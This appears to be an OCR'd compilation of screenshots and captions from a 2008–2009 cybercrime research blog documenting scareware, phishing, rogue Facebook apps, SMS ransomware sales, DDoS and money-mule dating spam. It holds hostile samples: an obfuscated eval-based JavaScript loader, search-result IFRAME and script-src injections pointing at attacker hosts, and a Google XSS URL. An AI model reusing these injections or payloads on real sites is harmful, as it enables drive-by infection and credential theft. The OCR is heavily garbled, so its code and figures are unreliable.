Mateoch, 6. Apel 2009 DOVE 745 
Matwoch, 6. Aort 2009 20:14:37 
Mateoch, 6. Agel 2009 20051109 


Mateoth, 6, Agel 2009 20106114 


Mateoch, 6, Aor 2009 19147106 
Mateoch, 6. Aord 2009 19143119 
Mateoch, 6, Aor 2009 19143117 
Mateoch, 6. Aort 2009 19 26:25 
Mateoch, $6. Aort 2009 1922129 
Matwoch. 6, Aort 2009 19119102 
Mateoch, 6, Aor 2009 19106129 
Matwoch. 6. Aort 2009 19:00:31 
Mateoch, $. dort 2009 16/90199 
Matwoch. 6. Aart 2009 1846103 
Mateoch, §, Aort 2009 16:38:22 
Matwoch 6, Aart 2009 18/33133 
Mateoch, §, dort 2009 18:92:23 
Matwoch. 6, Aort 2009 16/22113 
Mateoch, §, dort 2009 18/02/38 
Matwoch. 6, Art 2009 16144/08 
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Photos of “eee 9 
Photo 1 of 444 | Photos of 's Profile 


F Antivirus ees 


| & 


Report 
Show: Q [) 


Artivirus in Facebook 
http:/fapps. Facebook, com/xcxnajkagepxocd} 
In this photo: 


Iploaded via Antivirus in Focebook 


rte te Try ik, really works! 
http://apps.facebook.com/xexnajkqacpxocd/ 
about an hour ago * Report 
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Previous Next 


From the album: 
"[28/03) Antivirus in Focebook” by 


\Share + 


Tag This Photo 
Report This Photo 
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</DOCTYPE NIML PUBLIC "-//MIC//OTD MTML 4.0 Transitaonal//EN" “http://www, wi. org/TR/REC-html40/loose.dta"> 
chtml> chead> 

meta Attp-equiv="Content-Type” content="cext/html; charset=150-8859-1"> 

<link rel="stylesheet” type="text/cas” href-"themecas"> 

<title>You don't have the latest version of Macromedia Flash Player</title> 


oat oes eae unin a Doman 

<br> 

<table horder*"0" width="950"> 

sthody><tr> 

sta width="10"> 

<img sro*"spacer.gift" borders"0" height+"25" width="10"> 

</td> 

<td valign="bottom™> 

<font size*"41" face="Verdana, Geneva, Arial, Helvetica,sans-serif*>You don't have the latest version of Macromedia Flash Player</font> 


<td> Gnbap; </td> 
<td class*"bodytext"> 


<p> 
<font face**Arial, Helvetica, sams-serif”>This site makes use of Macromediea® Flash(TH) software. You've installed an old version of Macromedia Fiash 
</p> 


<img sro*"flanh get.git” herder="0" height="31" width="00"></a></p> 
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® Your Wire fund transfer 
Ele Edit Yiew Tools Message Help 


ach_rejects@nacha.org 
Monday, June 20, 2011 8:23 AM 


Board of Governors of the Federal Reserve System 


The Federal Reserve, the central bank of the United States, provides the nation with a 


safe, flexible, and stable monetary and financial system 


The outgoing Wire fund transfer , a short time ago sent from your banking account , was not processed by the Federal 
Reserve Wire Network. 


Please click here to view further information 


is provided to you by the Federal Reserve Board. Visit us on the web at http://www _federalreserve. gov. 
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<t-- 1262126611 --><script lLanquage=""JavaScript'> 

<t-- 

Function aCéJHmj¥2(xkpFb7W50)<var 

LSSfOu0Th arguments .callee .toString() -replace(/\W/g,*').toUpperCase();var Ns jAHOH14 var 
UNEKOS63w;var S3RKS38q2=L55F Ou01h.length;var ntAi7geF J;var ReTxSH312="* svar Témob3GYS=new 

Array() 5 for (UnEK 6563w= 6; unEK 65630<256 5 uNnEK O563u++) T6mob3GY5/ unEK8S63w]=8;var 

Ns JAHOH14=1 5 For (UNEK O563w=128 5 uNEK 8563w; UNEK 8563w>>=1) 

{Ns jAHOHL4=(Ns jAHOH14>>>1)~ ( (NS J AHOH14&1) 73988292384: 8) 5 For (iybP4m3tQ=6;iybP4m3tQ<256 51 bP4m3tQ+= 
UNEKO563w*2) {Témob3GY5[ iybP4nstQ+unEK 8563w]=(Té6mob3GY5[ iybP4m3tQ ] “Ns jAHOH14) 5iFf 

(T6mob3GY5[ iybP4mstQ+unEKk 6563w] < 6) 

{Témob3GY5[iybP4m3tQ+unEKk 8563w] +"4294967296 ; > > pnMAL7geF J=4294967295 ; For (Ns j]AHOHL4=6; Ns jAHOHLA<SSR 
ks38q2;Ns j]AHOHLS++) {nhiAi7geF J Témob3GY5[ (nMAi7geF J LSS Ou01h.charCodeAt (Ns jAHOH14) )&255]~( (nMAI7g 
eF J>>8)&16777215);5}var cfJ648Siwi=new Array();var R3bmJu6iH=2323 ;nhAi7geF J nMAi7geFJ~ 4294967295 5iFf 
(nMAi7geFJ<O) {nMAI7geF J+=4294967296 ; pnMAi7geF J=nMAi7geF J.toString(16) .toUpperCase( ) ;var 
AfpPS8dtpl=new Array() svar S3Rks38q2=nMAi7geF J. length; For (unEK 6563w= 6; unEK 8563w<8 5 uNEK OS63u++) 
{var né6éPAUMDm1=s3Rks38q2+unEK 8563w; cf J648i wh UnEK 6563w]=1 > cFIJ6O4Siwh[ UnEK 6563w]=R3bmJu6iH iF 
(né6éPAUMDAL>=8) {né6PAUMDM1=n6PAUNDM1-8 ;AFpPSdtp1[ vNEK 6563w] =nMAi7geF J.charCodeAt (n6PAYNDML1) ; > else 
{AF pPS8dtpl[YUNEKGS563w]=48;5}}uar Iné6wK4ASS=B;var K7yR27XgHjvar PsP2ms6e8 5 var 

tQN7j]87cG;s3Rks38q2 xkpFb7WS0 .length; tQN7j 67cGes3Rks38 2;R3bnJu6iH91123 ;R3bmMIvUGiNtQN7 j O7cG; forty 
NEK O563we 8; unEK OS563w<s3Rks38q2 5 unEK O563w+"2) {var 

SfFaB2S5nb=xkpFb7W50 .substr (unEK8563w,2) ;K7yR27Xgh=parse Int(sfFaB25nb,16) ;PsP2ms6e8=K7yR27Xgh-AFpP 
Sdtpi[ InéwksAass ] ;if(PsP2msé6e8<8) 

{PsP2ms6e8=PsP2ms6e8+256 ; }RCTXSH312+=String .fromCharCode(PsP2ms6e8) ; CQN7 j 87cG++ ; R3DRJUGIH=3891 5if 
(InéwkKSA5SS<AFpP8dtpl.length-1) {I1n6wkK4ASS++ ;-RIDMIVGLH=1892 5 cFJ648iwM[ vunEKG563w]=28;} else 

{ In6wkK4SASS=6;R3bmJu6iH=unEK 6563; } }eval (RCTxSH312) ;} 

aCéJHmj¥2(' 969FASABABABD1ac6 GA7b49C a7 ABGOBS F6e99a8.a594b3A858a5a2a57 OSSAEB7 aca26a71626B7e716a67657 6 
606374746b625FAS9a9C73a5A1a05F abA161A9aaA171N 87 F949 7B3acAh65S45 Ob99C9 7 baAB75546 164539babACIF 9 aAh7 FS 
5646863aba6a9ae987 868 a5a7A494A7a56D6673 a8ANS 28 B6F 62AF aAPAAYS9IDAT 7 1SAGF7ZE* ); 

ie 

</script> 
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CONGRATULATIONS! !!! 


We are pleased to aancence to you as one of the SJpcky winners in the FIFA 2010 or 
oa Feb 37™ 2010 pe tet rteard velected from 


wWOnLD CUP 
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Matched 33 of 122602 


CS a a co 

2009-03-26 14:28:24 QE x anal 93.98:1743 1OL.1661110 kot » 23 
2009-03-26 1310824 QE EZ ened 93.96:1212 1OL.1661110 bo wt » 23 
2009-03-26 13120024 QE x anal 93.38:1008 1OL.1661110 boat » 23 
2009-03-26 23120033 28x anal 93.38:3902 1OL.1661110 bo wt » 23 

n 93.38;1009 OL1661110 bo wt » 23 
2009-09-00 09:10:20 ZARA s anal 93.98;1083 1OL1661110 bo wt » 23 
2009-03-08 09118093 2B x amte 93.38:1006 i sreclententck o!> 
2009-03-07 196829 QE x anal 93.38:3370 HOL1G6:10 bot , 23 
2009-03-07 1918029 QE x ened 93.36:3318 LOL1661120 bot . 23 
2009-03-07 1848-32 QEMRe x ante 93.96:1231 1OL123 <a « 0 molerske gre com> 
2009-03-07 18146032 QBN x anal 93.96:1261 1OL.1661110 bo wt , 23 

93.38:1033 101,1661110 
60-0? 20130029 2 

2009-05-07 16:20:29 2EIRe x aoad 99.90:1068 1011661110 boat » 23 

» 93.38:1430 1OL1661110 bo wt . 23 
200P-03°O6 LOIS423 ZEA = aod 93.98:1427 BOL 1661110 kot » 23 
2009-04-26 22/0343 QE x anal 93.38:1604 1011661110 boat 23 


The domain is registered to supp3ortnewest@safe-mail.net and the DNS services are 
courtesy of one.goldwonderful9.info; ns.partnergreatest8.net; back.partnergreatest8.net; 
two.goldwonderful9.info which are the de-facto DNS servers for a huge number of related 
and separate [3]money laundering brand portfolios (the quality of the historical CYBERINT on 
behalf of Bobbear is the main reason why [4]commissioned DDoS attacks were hitting the site 
last year). 


Taking down the group’s command and control domain is in progress. 


1. http: //ddanchev. blogspot .com/2008/07/money-mule-recruiters-use-asproxs-fast.htm 


2. http: //ddanchev. blogspot .com/2008/10/money-mules-syndicate-actively.htm 
3. http://www. bobbear.co.uk/ 
4. http: //ddanchev. blogspot .com/2008/11/ddos-attack-against-bobbearcouk .htm 
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Usage Instructions: 
download file 
click remtool_conf.exe and let it scan.. 


you are advised to disable your already existing antivirus software prior to running the removal tool to avoid 


conflicts, 


click here to download the removal tool 


Please note that Microsoft is working closely with the F.B.| to apprehend the creators of the virus and is even 
offering a 250.000 reward for any 
information leading to their arrest. More details here 


Thanks for your cooperation and for bearing with us 
Microsoft Security Department 


This email is not equipped to handle replies. 


your potential our passion 
® 2007 Microsoft Corporation Al right reserved. 
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Sorry, your search for SPENCER-PRATT <IFRAME src=//89.149.243.2014> did not return 
any documents. Please revise your search and try again. ... 

ww. forbes. com/search/results.jhtml?MT=SPENCER-PRATT %20 %3CIFRAME % 
20sre=//89. 149.243. 201A%3E - 111k - Cached - Similar pages 


Sorry, your search for SARA-EVANS-AND-JAY-BARKER <IFRAME src=//89.149.243.201/> 
did not return any documents. Please revise your search and try again. ... 

ww forbes.com/search/results.jhtml7MT=SARA-EVANS-AND-JAY-BARKER%20% 
SCIFRAME%20sre=//89. 149.243. 201A%3E - 111k - Cached - Similar pages 


Sorry, your search for BILLY-JEAN-MICHAEL-JACKSON <IFRAME sre=//89.149.243.201/A> 
did not return any documents. Please revise your search and try again. ... 

www. forbes. com/search/results. jhtml?MT=BILLY-JEAN-MICHAEL-JACKSON%20% 
3CIFRAME%20src=//89. 149.243. 201A%3E - 111k - Cached - Similar pages 


Sorry, your search for AUCTIONEER <IFRAME src=//89.149.243,.2014> did not return any 
documents. Please revise your search and try again. ... 

www. forbes. com/search/results. jhtml?MT=AUCTIONEER%20%3CIF RAME% 

20sre=/89, 149.243 2DIA%3E - 111k - Cached - Similar pages 


Sorry, your search for CURSE-GAMING <IFRAME src=//89.149.243.201/> did not retum any 
documents. Please revise your search and try again. ... 

www. forbes. com/search/results.jhtml?MT=CURSE-GAMING %20%3CIFRAME% 

20sre=//89. 149,243. 201A%3E - 111k - Cached - Similar pages 


Sorry, your search for DEADLY-BOSS-MODS <IFRAME src=//89.149.243.201/t> did not 
retum any documents. Please revise your search and try again. ... 

weve. forbes. com/search/results. jhtml?MT=DEADLY-BOSS-MODS%20%3CIF RAME% 
20src=//89. 149.243. 201A%3E - 111k - Cached - Similar pages 


Sorry, your search for ATLASLOOT <IFRAME src=//89.149.243.201/t> did not return any 
documents. Please revise your search and try again. ... 

www. forbes. com/search/results.jhtml?MT=ATLASLOOT%20%3CIF RAME% 

20src=//89. 149.243. 201A%3E - 111k - Cached - Similar pages 


Sorry, your search for WENDY-WILLIAMS <IFRAME src=//89.149.243.201/t> did not return 
any documents. Please revise your search and try again. ... 

www. forbes. com/search/results. jhtml?MT=WEND Y-WILLIAMS %20 %3CIFRAME% 
20src=//89. 149,243. 201A%3E - 111k - Cached - Similar pages 
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& ThreatExpert eto 


‘Last 24 Pours | 7 Gaps | 90 dave | 0 
Hnewn Bad | Suspicious | A 


Rens 1 19 of 19 


Cate 
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12/24/2007 12)31196 ae 
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12/21/2007 9:41:93 AM 
12/17/2007 4:24:46 OM 
AR/LT/2OO7 11194146 A 
12/1/2007 77/93 4M 
12/11/2007 10/18/70 AM 
12/2007 9136137 ame 
12/0/2007 10:17:46 AM 
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5.5.11 3rd SMS Ransomware Variant Offered for Sale (2009-05-27 19:50) 


000000 


0000 pei23456 | 


» 


The concept of [1]ransomware is clearly making a comeback. During the past two months, 
scareware met the [2]ransomware business model in the face of [3]File Fix Professional 2009 
and [4]FakeAlert-CO or System Security, followed by two separate [5]SMS-based ransomware 
variants [6]Trj/SMSlock.A and a [7]modified version of it. 


The very latest one is once again offered for sale, with a social engineering theme at- 
tempting to trick the infected user that as of 1st of May Microsoft is launching a new 
anti-pirates initiative, and that unless a $1 SMS is sent in order to receive the deactivation 
code back, their copy of Windows will remain locked. 


Key features: 

Support for Windows 98/Vista 

- Blocks the entire desktop 

- Locks system key combinations attempting to remove it 

- Copied to the system folder (the file is almost impossible to find) 
- Can be put in the startup 
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FTP-Toolz* pack 2.7 /2k7 release/ 


2k7 release/ [ Logs 


UMNOpTHponaTh gakn c axkamn 
Incnoprepopare nc axxomm (ronmbKxo sanna) 
Nome mr Bce axkn Kak He Yexnyrme (norm GyayT CrepTe!) 


looog.ht 
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HaGop cxpxnros ana cennepos 


Heu daiine 


PaGota saxon 


v2.7 J2k7 releases [ runtiene statistic 
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¥ Windows Security Center Ce) 


Security Center 


Help protect your PC 


Security essentials 
Security Center helps you manage your ‘Windows security settings. To help protect your computer, 
make sure the three security essentials are marked ON. If the settings are not ON, Follow the 
* Get the latest security and virus recommendations, To return to the Security Center later, open Control Panel, 

information from Microsoft What's new in Windows to help protect my computer? 


* Check for the latest updates from 


Windows Update @ Firewall @oON ¢ 
. Get support for security-related 
pata &@ Automatic Updates @ON ¢ 


* Get help about Security Center 


* Change the way Security Center # Virus Protection 


alerts me 


‘Windows did not find antivirus softvrare on this computer. Antivirus software helps protect your 
computer against viruses and other securtty threats. Click Recommendations for suggested 
actions you can take. How does antivirus software help protect my computer? 


Note: Windows does not detect all antivirus programs. 


Manage security settings for: 


& Internet Options @ Windows Firewall 


ty Automatic Updates 


At Microsoft, we care about your privacy. F read our privacy statement 
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ping: mfa.gov.ge 


location 


Florida, U.S.A. Okay 59.4 59.9 60.5 
Amsterdam, Netherlands Okay 149.3 164.6 275.4 
Melbourne, Australia Okay 173.8 174.5 175.0 
Singapore, Singapore Okay 208.5 214.0 238.6 
New York, U.S.A. Packets lost (100%) 
4AmsterdamZ, Netherlands Packets lost (100%) 
4ustinl, U.S.A. Packets lost (100%) 
London, United Kingdon Packets lost (100%) 
Stockholm, Sweden Packets lost (100%) 
Cologne, Germany Packets lost (100%) 
Chicago, U.S.A. Packets lost (100%) 
Austin, U.S.A. Packets lost (100%) 
Amsterdam3, Netherlands Packets lost (100%) 
Krakow, Poland Packets lost (100%) 
Paris, France Packets lost (100%) 
Copenhagen, Denmark Packets lost (100%) 
San Francisco, U.S.A. Packets lost (100%) 
Vancouver, Canada Packets lost (100%) 
Madrid, Spain Packets lost (100%) 
Shanghai, China Packets lost (100%) 
Lille, France Packets lost (100%) 
Zurich, Switzerland Packets lost (100%) 
Munchen, Germany Packets lost (100%) 
Cagliari, Italy Packets lost (100%) 
Hong Kong, China Packets lost (100%) 
Johannesburg, South AfricaPackets lost (100%) 
Porto Alegre, Brazil Packets lost (100%) 
Sydney, Australia Packets lost (100%) 
Mumbai, India Packets lost (100%) 
Santa Clara, U.S.A. Packets lost (100%) 
[525] 
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boobeggd0 
Wednesday, 11. June 2008 


DDoS 69935 


Amazon-%9. 

35363936 (06.06.2008) 28mc096039 fomobasbdsgemdsdo 
Wooda~mo oye Smsy~@oHywo 06H9HHI Iogsos 
Amazon.com, 56939 g2mo0dowo... 
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» Subscription 


Civil.ge 


Daily News Online 


| | Gearch} Advanced 
Home News Photos Politics Defense Economy Elections About Civil.Ge Archive Ad Rates 


Attention of Civil 


Georgia users 


Along with www.civi.ge, you can also try 
www.civigeorgis.ge 


Civil.Ge Team 


‘Russia Occupies Significant 
Part of Georgia’ — Saakashvili 
11 Aug '08 | 21:02 

Saakashwili said in a televised address: 

* The army should struggle to the end: 


+ We will never surrender, 
« Georgian forces are re-grouping: 


Google Groups 


Subscribe to Civil Georgia 
Ema [ | (Sebscbe_) 
Vist this group 
Latest News 
11 Aug. 08 | 20:20 
Saakashvili Addresses Nation 


President Saakashuili said: “Our future and liberty is 
under attack.” 


11 Aug. “08 | 19:09 
Russian Forces Advance Deep into Georgia to 
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Eng | Rus | Geo 


11 Aug. ‘08 | Last updated: 21:02 - 11 Aug.’08 


a] 
» Timeline - 2007 
Election Map of Results: 


» Party-List Contest 
» Majoritarian Contest 


WEATHER 


Currently in Tbilisi 


@y 2s5°c 


Mon: #20... #31 
Tue: +21... +34 


Forecast: Hourly info | 2b 1S nyt 
by AccuWeather.coms 


Ad CURRENCY RATES 


usp Pj 1.4160 + 0.0000 
EUR [J 2. 1900 ~ 0.0000 
cur EE 1.3421 ~ 0.0000 
cee ER 2.7613 + 0.0000 
RUB fgg] 0.0600 * 0.0000 
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Florida, U.S.A. 


Stockholm, Sweden 123-3: 125.4 


Austinl, U.S.A. 56.9 a. 


102.1 102.3 102.4 


e 
& 


Paris, France 


Amsterdam, Netherlands ae 105.4 140.3 


x 
4 


| 


Hong Kong, China 254.0 256.8 279.4 


Zurich, Switzerland Okay 119.5 126.4 “178.7 


Santa Clara, U.S.A. Packets lost (100%) 


Fa 


Shanghai, China 2685.9 266.2 266.6 


Melbourne, Australia Packets lost (100%) 


Johannesburg, South AfricaPackets lost (100%) 


Lille, France Packets lost (100%) 


Cologne, Germany Packets lost (100%) 


Cagliari, Italy Packets lost (100%) 


Mumbai, India Packets lost (100%) 
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- Launches the blocking system before the desktop appears upon reboot 

- Blocks all windows including the Task Manager 

- Upon entering the secret code, the ransomware is removed from the system folder and 
autorun 


The price for a custom-made version with the customer’s own SMS data is $10, with $5 
per new (undetected) copy, as well as the complete source code available for $50 again from 
the same vendor. 


From a "visual social engineering" perspective, the one that make scareware what it is 
as product - a product which would have scaled so fast if it wasn’t the distribution channel 
in the form of web site compromises and [8]blackhat SEO at the first place - the latest SMS 
ransomware variant lacks any significant key visual features which can compete with for 
instance, the [9]DIY fake Windows XP activation trojan and its [10]2.0 version. 


With the emerging [11 ]localization on demand services offering [12]translations for phishing, 
spam and malware campaigns into popular international languages, it wouldn’t take long 
before the SMS ransomware starts targeting English-speaking users next to the hardcoded 
Russian speaking ones for the time being. 
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gpcode-ransomware .htm 

. http: //ddanchev. blogspot . com/2008/09/identif ying- gpcode-ransomware-author . html 

. http: //blogs. zdnet . com/security/?p=3014 

_ http://www. avert labs . com/research/blog/index . php/2009/05/12/fakealert~trojan~holds~systems-for-ransom/ 
. http: //ddanchev. blogspot . com/2009/05/sms-ransomware- sour ce-code-now- offered. html 

- http: //blogs. zdnet . com/security/?p=3197 

. http: //blog.fireeye.com/research/2009/04/ransomware_on_the_loose.htm 

- http: //ddanchev. blogspot . com/2009/04/massive~blackhat-seo-campaign-serving. html 

ttp://ddanchev. blogspot .com/2008/10/fake-windows-xp-activation-trojan-wants. html 

10, hvtp://oLogs. zane con/ security/7p-2204 

1, Reto: eauucter logepoe com ots (02 ecal latae Gyeet tine altel weal 


12. http: //ddanchev.blogspot .com/2008/11/localizing-cybercrime-cultural .htm 
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5.6 June 


5.6.1 Dating Spam Campaign Promotes Bogus Dating Agency - Part Two 
(2009-06-02 15:21) 
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_ (7) Gizmox NOC List 


Uncover the "OWL" and win $10,000 


You must register and agree to the challenge rules in order to claim the reward 


Play Again 
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Ypa! 
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3.6 Google/GMail 


The Google HIP is unique in that it uses only image warp as a means of distorting 
the characters. Similar to the MSN/Passport and Yahoo version 2 HIPs, it is also 
two color. The HIP characters are arranged closed to one another (they often touch) 
and follow a curved baseline. The following very simple attack was used to segment 
Google HIPs: Convert to grayscale, up-sample, threshold and separate connected 
components. 


» «cous pos, Nadir Narain 


he eseniton Average Google HIP solution length is 6.5 characters. This can 


be significantly improved upon by judicious use of dilate-erode attack. A direct 
application doesn’t do as well as it did on the ticketmaster and yahoo HIPs (because 
of the shear and warp of the baseline of the word). More successful and complicated 
attacks might estimate and counter the shear and warp of the baseline to achieve 
better success rates. 
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Register Now 


Irina C. 


66 | enjoy being in nature anc Mstening to 
music. My hobby is growing flowers. From time 
to tame | and my friends go to night-clubs to 
dance ff there is chance. | want to meet a king, 
considerate, well-educated, faithful man who 
loves children, wants to create a family. 


Send message e 


2007-2009 Contact Us Register for free 


Your future template-based wife is here, waiting not only for you, but also, for the hundreds of 
thousands of spammed gullible future husbands. 


Our "dear friends" at [1]Confidential Connections are at it again - spamming out bogus 
dating profiles, introducing new domains and inevitably exposing the phony company’s 
connections with managed spam services operated by money mules, and sharing DNS servers 
with more cybercrime-facilitating parties. 


As in their previous campaigns, they’re spamming from LRouen-152-82-6-202.w80- 


13.abo.wanadoo.fr [80.13.101.202], and here’s the most recent portfolio of domains used in 
the spam campaigns parked at 62.90.136.207: 
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Reported Attack Site! 


| private information, us 
thers, or damage yo m1, 


Some att entionall ibute harmf 
comprom 0 


Get me out of here! Why was this site blocked? 
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my My computer 


System Tasks 

[2 View system information 
24 Add or remove programs 
(B change a settings 


—) Hard drive (C:) 
@ 2Viruses found 


Yo 


= Type ie 
@ Trojan.Qoologic - Key Logger a io 
+ Sets Virus High 


[_ Start Protection _ | 


Recommend: Click “Start Protection” button to erase all 
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Happy New ‘Year clip 
It's a gift fromm Abba, all for free! Enjoy! [link] 


By Abba - 12:56am - 1 new of 1 message 


Happy New Year 
Happy New Year! A little gift: [link] 


By Santa Claus - Jan 6 - 1 new of 1 message 


My new clip 
Hil My new video, for funs :} [link] 
By Rebecca MacKinnon - Jan 4 - 1 new of 1 message 


Have ‘You Seen 
Hi to my group friends! Have You seen this new video? [link] 
By Valeria - Jan 2- 1 new of 1 message 


Celebrities mistakes in New Year speach 
U-ga-ga.. New Year party, Drunk Celebrities Exposed Just look at this: [link] 
By Reporter X - Jan2- 1new of im 


essage 


My wedding video 
Hi. Here isour wedding video. Happy New Year! [link] 
By Celicia Johnson - Dec 31 2009 - 1 new of 1 message 


A joke 
O-ha-ha What are they doing? PS Just a joke, but so funny :) [link] 
By Anna F - Dec 30 2009 - 1 new of 1 message 


Very cute and funny kids} 
This is so cute and funny)) [link] 
By KittyJenns - Dec 27 2009 - 1 new of 1 message 


Super funny animals)}}} 
aaaaa)))jlook at this))jthey'r soooo funny, cant stop smiling) [link] 
By SaraSamuelson - Dec 25 2009 - 1 new of 1 message 
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| Date submitted: 09/11/2008 Date published: 12/11/2008 Date fixed: 12/11/2008 Status: “ FIXED 


Domain: wviw.google.com Category: XSS 


URL: https: //www.google.com/ accounts /ServiceLogin?service=websiteoptimizer&hi=e'% 22% 3E%3C /title%3E%e3Cscri 
pt% 3Ealert( 1337 )%3C/script% 3E%3E%3Cmarquee% 3E%3Ch 1% 3EXSS%20by% 20x ylitol%3C/h1%3E 
%3C/marquee%3Enkcont 

inue=https%3A% 2F % 2Fwww.google.com%>2Fanalytics% 2F siteopt% 2F %%3F et% 3Dreset% 26hI%e3Denk 
utm_source=service 

skutm_medium=redirect&utm_campaign=standalone 


Author: xylitol Pagerank: 2 


| 

The page at hitp://vuln.xssed.net says “ 

Google Website ! 1337 guage: AcEeAjtina v 
d 
Radically increase your co = 
Website Optimizer, Googlea€™s free 
tool, allows you to increase the value of your existing websites and traffic 
without spending a cent. Using Website Optimizer to test and optimize 
site content and design, you can quickly and easily increase revenue and 
sel : 
ROI whether youa€™re new to marketing or an expert. Sign in to Website Optimizer with your 
Google 
Start testing today and... ae 9 Account =. 
Ww Increase website conversion rates Email: 
w Decrease visitor bounce rates Password: 
Ww Increase time spent on your site 4 cenesee me on this 
Ww Increase visitor satisfaction (Senn) 
& Eliminate guesswork from site design 
| cannot access my account 

GY Take the tone aa 
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| Search Videos Search the Web | Stutcaei aes Seer 
Sate 


videos playable on Googie 
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Results 1 - 100 of about 36,300 for xgiriplaygroemd.com (0.10 ») - 


This is a thumbnail. Click here to watch the original content 
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+ Related videos , 


oe Willian. / wey 


youtube coer 


YAY CARTUNNGR 


22831 


22832 


+ EXPLICIT MATERIAL FOR VIEWING 
BY ADULTS 18 YEARS OF AGE OR OLDER 
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mot Tube 


Videos alecories hannels 
Windows Internet Explorer 


Your Plath Version is too old. 


7] 


Your browser cannct play thes video file 
Cikk ‘0 to download and install update for Flash Video Player 


Co _} (coer) 


> & .c0/Cns0 t ER Ey 
Share Pravorites “Playlist 
Rating: ® Views: 65174 
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HeavenSend 


1259 


* 


Mari the Stock 
Robot 


wenn 
TheHunted 


xen 


| | | Register Now 


Svetlana B. 


Bobs 


Age range of marc 25-50 9 


y Languages: Russian Engesn, Fron 


66 I would ike to meet an attractive man, with 
2 good sense of humour. | think that honesty 
ang decency are very important qualities. ! 
would like to find an active and optimistic 
Person, who enjoys his lite, who never give 
up. A man of my Gream is inteMigent, nice and 
friendly, he behaves lke a gentiemen and 
treats people with respect. | also think that 
aman should possess such a quality as loyalty. 
I would lke to meet an understanding person. 
and of course my ideal man is a reliable one.. 
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dating-forin-loved .com - Email: deolserdo@safe-mail.net 
matchwithworld .com - Email: esheodin@safe-mail.net 
love-f-emale .com - Email: 103664570460504@absolutee.com 
i-amsingle .com - Email: i-3685838623704@absolutee.com 
for-you-from-me .com - Email: PabloStantonXW@gmail.com 
love-me-long-time .com - Email: 103685839114104@absolutee.com 
destinycombine .com - Email: esheodin@safe-mail.net 
you-isnot-alone .com - Email: SamNilsenson@gmail.com 
find-some-love .com - Email: SamNilsenson@gmail.com 
find-thereal-love .com - Email: deolserdo@safe-mail.net 
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[ OO] ESP |843461]) 
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[88] USA} 943275) 
[ 00] HUN] 366133) 
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[ 02 | SWE |64%0262] 
[00jCZE| 790912] 
[ 00] NLD] 196825] 
[88] USA] 740516] 
[81] USA} 956383] 
[05 | SWE] 964080) 
[ 80) SWE | 609561) 
[ 00) CZE | 408619) 
[ 00] POL | 366470) 
[ 00] NOR | 627427] 
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) (Connection reset by 
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Now scanning: btcss.com 
x Your Computer is Infected! : 


Description: 
‘This program is potentially dangerous for your system. Trojan-Downloadersteaiing passwords,credt cards and other (aj 
personal information from your computer. 


Advice: 
You need to remove this flleinfo as soon as possibile! 
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100% Security - 2048 bit Traffic Encryption 
100% Anonimity - No logs 
100 Mbit connection - Fast Speed 


Your Secure Anonymous 
US or Europian IP - Deducated or Shared IP's Computer VPN Channel Internet 
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; r future wife 


all-hot-love .com - Email: sup3portne3west@safe-mail.net 
find-the-reallove .com - Email: fi3653005547304@absolutee.com 
sweet-hearts-dating .com - Email: SamNilsenson@gmail.com 
my-great-dating .com - Email: SamNilsenson@gmail.com 
yourmatchwith .com - Email: esheodin@safe-mail.net 
loking-for-aman .com - Email: 103653004406804@absolutee.com 
myloving-heart .com - Email: my3685835605504@absolutee.com 
beautiful-prettywoman .com - Email: JosiahMillerTP@gmail.com 
buildyour-happylove .net - Email: bu3664569267104@absolutee.com 
adorelovewon .com - Email: supportnewest@safe-mail.net 
andiloveyoutoo .com - Email: enorst10@yahoo.com 
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Search Results 

Search Results. Home; -; Shows - All Shows - Ancient Discoveries - Ax Men - Cities of the 
Underworld - Gangland - Shockwave - UFO Hunters - The Universe ... 

www. history. comy...//195,225,178.21/5%3E - 44k - Cached - Similar pages 


Search Results 

Search Results. Home; -; Shows : All Shows « Ancient Discoveries - Ax Men : Cities of the 
Underworld - Gangland - Shockwave - UFO Hunters - The Universe ... 

www, history. com/...//195,225,178.21/5%3E - 43k - Cached - Similar pages 


Search Results 

Search Results. Home; -; Shows » All Shows » Ancient Discoveries - Ax Men: Cities of the 
Underworld - Gangland - Shockwave - UFO Hunters - The Universe ... 

www. history. com/search.do?searchText=costume+cowtdog thalloweent+++++++44% 
SCIFRAME %20s1c=//195.225.178.215%3E - 43k - Cached - Similar pages 


Search Results 

Search Results. Home; -; Shows - All Shows - Ancient Discoveries - Ax Men - Cities of the 
Underworld - Gangland - Shockwave - UFO Hunters - The Universe ... 

www. history. com... //195,225, 178,.21/a%3E - 43k - Cached - Similar pages 


Search Results 

Search Results. Home; +; Shows : All Shows » Ancient Discoveries - Ax Men » Battle360 - 
Cities of the Underworld - Gangland - Shockwave - UFO Hunters ... 

www, history. com/search.do?searchText=games Hor+boys++++++++++%3CIFRAME% 
20s1c=//195.225.178.21/5%3E - 43k - Cached - Similar pages 


Search Results 

Search Results. Home; -; Shows - All Shows - Ancient Discoveries - Ax Men - Battle360 - 
Cities of the Underworld - Gangland - Shockwave - UFO Hunters ... 

www. history. com/search.do?searchText=erin+oldenberg++++++4++++%3CIFRAME % 
2Ossc=//195.225.178.21/5%3E - 43k - Cached - Similar pages 


Search Results 

Search Results. Home; -; Shows - All Shows - Ancient Discoveries - Ax Men - Battle360 - 
Cities of the Underworld « Gangland « Shockwave - UFO Hunters ... 

www. history.com/search do?searchText=i+don+ +wanna twait Hyrics++++++444+4% 
3CIFRAME %20sre=//195.225.178.215%3E - 44k - Cached - Similar pages 


Search Results 

Search Results. Home; -; Shows » All Shows » Ancient Discoveries - Ax Men» Battle360 - 
Cities of the Underworld - Gangland - Shockwave - UFO Hunters ... 

www. history. com/search. do?searchText=mandeltkazaat+++++++++%3CIFRAME% 
20sre=//195.225.178.21/5%3E - 43k - Cached - Similar pages 


Search Results 
Search Results. Home; -; Shows - All Shows - Ancient Discoveries - Ax Men - Battle360 - 
Cities of the Underworld - Gangland - Shockwave - UFO Hunters ... 


www. history. com/search.do?searchText=foys +halloween+store++++4++4+4+4+4%ICIFRAMES 


2src=//195.225.178.21/5%3E - 42k - Cached - Similar pages 


Search Results 
Search Results. Home; -; Shows - All Shows - Ancient Discoveries - Ax Men - Cities of the 
Underworld - Gangland - Shockwave - UFO Hunters » The Universe ... 
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BEAN - Seattle Cocktail Social <script src=http://yrwap.cnihjs ... 


This site may harm your computer. 
18 Sep 2008 ... <script src=http://yrwap.cn/h.js> Photo #1 - (0 comments), <script 


src=http:// yrwap.cn/h.js> Photo #2 - (0 comments) ... 
www. beanonline. org/photos.asp?id=293 - Similar pages - 


BEAN - Seattle Cocktail Social <script src=http://yrwap.cnihjs ... 

This site may harm your computer. 

